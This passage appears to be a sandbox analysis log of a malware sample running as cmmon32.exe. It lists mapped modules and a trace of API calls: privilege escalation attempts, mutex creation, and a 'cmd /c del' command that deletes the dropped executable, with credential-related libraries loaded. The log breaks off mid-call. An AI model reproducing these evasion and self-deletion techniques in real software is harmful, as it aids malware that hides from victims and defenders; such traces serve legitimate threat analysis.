id = 1492 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1493 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1494 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1495 start_va = 0x80000 end_va = 0x81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1496 start_va = 0x90000 end_va = 0x91fff entry_point = 0x90000 region_type = mapped_file name = "cmmon32.exe.mui" filename = "\\Windows\\System32\\en-US\\cmmon32.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmmon32.exe.mui") Region: id = 1497 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1498 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1499 start_va = 0x390000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 1500 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1501 start_va = 0x4d0000 end_va = 0x60afff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1502 start_va = 0xf00000 end_va = 0x1afffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 1503 start_va = 0x610000 end_va = 0x74cfff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1504 start_va = 0x750000 end_va = 0x9cafff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1505 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1506 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1729 start_va = 0x1c0000 end_va = 0x1e9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1730 start_va = 0x4d0000 end_va = 0x4f9fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1731 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1732 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1733 start_va = 0x9d0000 end_va = 0xbc4fff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1734 start_va = 0xbd0000 end_va = 0xdc4fff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 1735 start_va = 0x1b00000 end_va = 0x24c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b00000" filename = "" Region: id = 1736 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1737 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1738 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1739 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1740 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1741 start_va = 0x24d0000 end_va = 0x26c4fff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1742 start_va = 0x5a0000 end_va = 0x5fbfff entry_point = 0x5a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1743 start_va = 0x5a0000 end_va = 0x5fbfff entry_point = 0x5a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1744 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1745 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1746 start_va = 0x690000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1747 start_va = 0xdd0000 end_va = 0xeaefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 1748 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1749 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1750 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1751 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 1752 start_va = 0x6d270000 end_va = 0x6dceffff entry_point = 0x6d270000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1753 start_va = 0x77110000 end_va = 0x77114fff entry_point = 0x77110000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1754 start_va = 0x726e0000 end_va = 0x7271bfff entry_point = 0x726e0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1755 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1756 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1757 start_va = 0x75610000 end_va = 0x7580afff entry_point = 0x75610000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1758 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x4a0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 1759 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1760 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1761 start_va = 0x540000 end_va = 0x540fff entry_point = 0x540000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1762 start_va = 0x550000 end_va = 0x551fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1763 start_va = 0x26d0000 end_va = 0x299efff entry_point = 0x26d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1764 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1765 start_va = 0x71ba0000 end_va = 0x71bcdfff entry_point = 0x71ba0000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 1766 start_va = 0x76490000 end_va = 0x765c5fff entry_point = 0x76490000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1767 start_va = 0x76cf0000 end_va = 0x76de4fff entry_point = 0x76cf0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1768 start_va = 0x540000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1769 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1770 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x5a0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1771 start_va = 0x5b0000 end_va = 0x5b7fff entry_point = 0x5b0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1772 start_va = 0x5c0000 end_va = 0x5cbfff entry_point = 0x5c0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1773 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1774 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1775 start_va = 0x5d0000 end_va = 0x5d7fff entry_point = 0x5d0000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 1776 start_va = 0x5e0000 end_va = 0x61ffff entry_point = 0x5e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 1777 start_va = 0x29a0000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 1778 start_va = 0x72000000 end_va = 0x721b4fff entry_point = 0x72000000 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files\\mozilla firefox\\nss3.dll") Region: id = 1779 start_va = 0x6e510000 end_va = 0x6e541fff entry_point = 0x6e510000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1780 start_va = 0x722a0000 end_va = 0x722a6fff entry_point = 0x722a0000 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll") Region: id = 1781 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1782 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1783 start_va = 0x70fb0000 end_va = 0x7106efff entry_point = 0x70fb0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 1784 start_va = 0x722a0000 end_va = 0x722abfff entry_point = 0x722a0000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 1785 start_va = 0x73d70000 end_va = 0x73efffff entry_point = 0x73d70000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 1786 start_va = 0x24d0000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1787 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1788 start_va = 0x6d0000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1789 start_va = 0x710000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1790 start_va = 0x2aa0000 end_va = 0x2f91fff entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 1791 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1792 start_va = 0x73aa0000 end_va = 0x73b9afff entry_point = 0x73aa0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1793 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1794 start_va = 0x620000 end_va = 0x620fff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1795 start_va = 0x25b0000 end_va = 0x26affff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 1796 start_va = 0x24d0000 end_va = 0x25cffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Thread: id = 100 os_tid = 0xbd8 [0070.577] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x24f050 | out: HeapArray=0x24f050*=0xb0000) returned 0x3 [0070.583] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x24f000, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0070.585] NtCreateFile (in: FileHandle=0x24f020, DesiredAccess=0x120089, ObjectAttributes=0x24efe8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24f008, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24f020*=0x3c, IoStatusBlock=0x24f008*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0070.593] NtQueryInformationFile (in: FileHandle=0x3c, IoStatusBlock=0x24f008, FileInformation=0x24ef60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24f008, FileInformation=0x24ef60) returned 0x0 [0070.702] NtReadFile (in: FileHandle=0x3c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x24f008, Buffer=0x4d0020, BufferLength=0x13a928, ByteOffset=0x24ef78*=0, Key=0x0 | out: IoStatusBlock=0x24f008, Buffer=0x4d0020*) returned 0x0 [0070.718] NtClose (Handle=0x3c) returned 0x0 [0070.761] NtQueryInformationFile (in: FileHandle=0x3c, IoStatusBlock=0x24efa8, FileInformation=0x24ed1c, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x24efa8, FileInformation=0x24ed1c) returned 0x0 [0070.761] NtClose (Handle=0x3c) returned 0x0 [0070.996] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x24f034, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x24f034, ResultLength=0x0) returned 0x0 [0070.999] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x24f058, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x24f058, ReturnLength=0x0) returned 0x0 [0071.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24ece8*=0x0, ZeroBits=0x0, RegionSize=0x24ecec*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24ece8*=0x1c0000, RegionSize=0x24ecec*=0x10000) returned 0x0 [0071.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1c0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1c0000, ResultLength=0x0) returned 0x0 [0071.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24f048*=0x1c0000, RegionSize=0x24f04c, FreeType=0x8000) returned 0x0 [0071.040] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x24ee04 | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0071.043] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x24f060 | out: TokenHandle=0x24f060*=0x3c) returned 0x0 [0071.045] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24f054 | out: lpLuid=0x24f054*(LowPart=0x14, HighPart=0)) returned 1 [0071.049] NtAdjustPrivilegesToken (in: TokenHandle=0x3c, DisableAllPrivileges=0, NewState=0x24f050, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0071.050] NtClose (Handle=0x3c) returned 0x0 [0071.050] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x24eba8 | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0071.051] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="664908S9", Value=0x24ee40 | out: Value=0x24ee40) returned 0xc0000100 [0071.051] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x24e988 | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0071.053] NtOpenDirectoryObject (in: FileHandle=0x24ec34, DesiredAccess=0x2000f, ObjectAttributes=0x24ec00*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x24ec34*=0x3c) returned 0x0 [0071.055] NtCreateMutant (in: MutantHandle=0x24ee60, DesiredAccess=0x1f0001, ObjectAttributes=0x24ebe8*(Length=0x18, RootDirectory=0x3c, ObjectName="664908S9UTEIZ6MN", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x24ee60*=0x80) returned 0x0 [0071.055] NtClose (Handle=0x3c) returned 0x0 [0071.055] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x24e868 | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0071.055] NtOpenDirectoryObject (in: FileHandle=0x24ec2c, DesiredAccess=0x2000f, ObjectAttributes=0x24ebf8*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x24ec2c*=0x3c) returned 0x0 [0071.055] NtCreateMutant (in: MutantHandle=0x24ee58, DesiredAccess=0x1f0001, ObjectAttributes=0x24ebe0*(Length=0x18, RootDirectory=0x3c, ObjectName="OLO0NDS-0AXWwKzG", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x24ee58*=0x84) returned 0x0 [0071.055] NtClose (Handle=0x3c) returned 0x0 [0071.059] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x24ea70 | out: Value="C:\\Program Files") returned 0x0 [0071.059] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x24ea9c | out: Value="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x0 [0071.065] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Temp\\lambdoidtegument.exe", NtPathName=0x24ea48, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Temp\\lambdoidtegument.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0071.067] NtCreateFile (in: FileHandle=0x24ea68, DesiredAccess=0x120089, ObjectAttributes=0x24ea30*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Temp\\lambdoidtegument.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24ea50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24ea68*=0xffffffff, IoStatusBlock=0x24ea50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0071.067] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", NtPathName=0x24ee18, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0071.067] NtCreateFile (in: FileHandle=0x24ee38, DesiredAccess=0x120089, ObjectAttributes=0x24ee00*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24ee20, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24ee38*=0x3c, IoStatusBlock=0x24ee20*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0071.070] NtQueryInformationFile (in: FileHandle=0x3c, IoStatusBlock=0x24ee20, FileInformation=0x24ed78, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24ee20, FileInformation=0x24ed78) returned 0x0 [0071.076] NtReadFile (in: FileHandle=0x3c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x24ee20, Buffer=0xc7548, BufferLength=0x3a000, ByteOffset=0x24ed90*=0, Key=0x0 | out: IoStatusBlock=0x24ee20, Buffer=0xc7548*) returned 0x0 [0071.077] NtClose (Handle=0x3c) returned 0x0 [0071.077] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", NtPathName=0x24ee08, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0071.077] NtCreateFile (in: FileHandle=0x24ee28, DesiredAccess=0x120089, ObjectAttributes=0x24edf0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24ee10, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24ee28*=0x3c, IoStatusBlock=0x24ee10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0071.078] NtQueryInformationFile (in: FileHandle=0x3c, IoStatusBlock=0x24ee10, FileInformation=0x24ed68, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24ee10, FileInformation=0x24ed68) returned 0x0 [0071.078] NtClose (Handle=0x3c) returned 0x0 [0071.078] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x24e308, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0071.078] NtCreateFile (in: FileHandle=0x24e328, DesiredAccess=0x120089, ObjectAttributes=0x24e2f0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e310, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e328*=0x3c, IoStatusBlock=0x24e310*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0071.078] NtQueryInformationFile (in: FileHandle=0x3c, IoStatusBlock=0x24e310, FileInformation=0x24e084, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x24e310, FileInformation=0x24e084) returned 0x0 [0071.078] NtClose (Handle=0x3c) returned 0x0 [0071.079] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/c del \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x24e9d8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24ea1c, hNewToken=0x0 | out: lpProcessInformation=0x24ea1c*(hProcess=0x88, hThread=0x3c, dwProcessId=0xc80, dwThreadId=0xc84), hNewToken=0x0) returned 1 [0071.114] NtWaitForSingleObject (Object=0x88, Alertable=0, Time=0x0) returned 0x0 [0071.625] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x24e6f4 | out: Value="C:\\Program Files") returned 0x0 [0072.974] SetErrorMode (uMode=0x8003) returned 0x1 [0072.976] NtCreateSection (in: SectionHandle=0x24ea80, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x24e7fc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: 